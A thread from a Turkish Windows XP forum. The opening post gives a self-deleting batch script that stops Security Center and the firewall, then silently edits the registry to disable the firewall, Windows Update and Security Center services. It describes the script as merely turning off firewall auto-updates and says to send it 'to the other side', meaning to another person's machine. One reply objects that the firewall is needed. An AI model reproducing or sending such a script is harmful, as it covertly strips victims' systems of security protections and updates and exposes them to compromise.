xp de güvenlik duvarı kaldırma

Windows XP hakkındaki bilgi, belge ve ipucu paylaşım alanıdır.
Cevapla
Kullanıcı avatarı
lord_leo
Megabyte3
Megabyte3
Mesajlar: 1440
Kayıt: 25 Nis 2010, 08:39
cinsiyet: Erkek
Teşekkür edildi: 7 kez

xp de güvenlik duvarı kaldırma

Mesaj gönderen lord_leo »

Bu program XP nin güvenlik duvarini(firewall) otomatik güncellestirmesini kapatir.
Kullanimi:
ilk olarak çalistirda notepad ' i açiyoruz.daha sonra asagida yazdiklarimi .bat olarak farkli kaydediyoruz
 
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO PCkopat
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0


VE KARŞI TARAFA YOLLUYORUZ
(alıntıdır)
Kullanıcı avatarı
loveme
Terabyte1
Terabyte1
Mesajlar: 3845
Kayıt: 10 Tem 2007, 11:47
cinsiyet: Erkek
Teşekkür etti: 1 kez
Teşekkür edildi: 117 kez
İletişim:

Re: xp de güvenlik duvarı kaldırma

Mesaj gönderen loveme »

Güvenlik duvarının sağladıkları var sanırım ve kaldırılmamalı bence...
Kullanıcı avatarı
modestus
Gigabyte4
Gigabyte4
Mesajlar: 3081
Kayıt: 23 Nis 2008, 15:57
cinsiyet: Erkek
Teşekkür edildi: 1 kez

Re: xp de güvenlik duvarı kaldırma

Mesaj gönderen modestus »

yerine taşındı..
Cevapla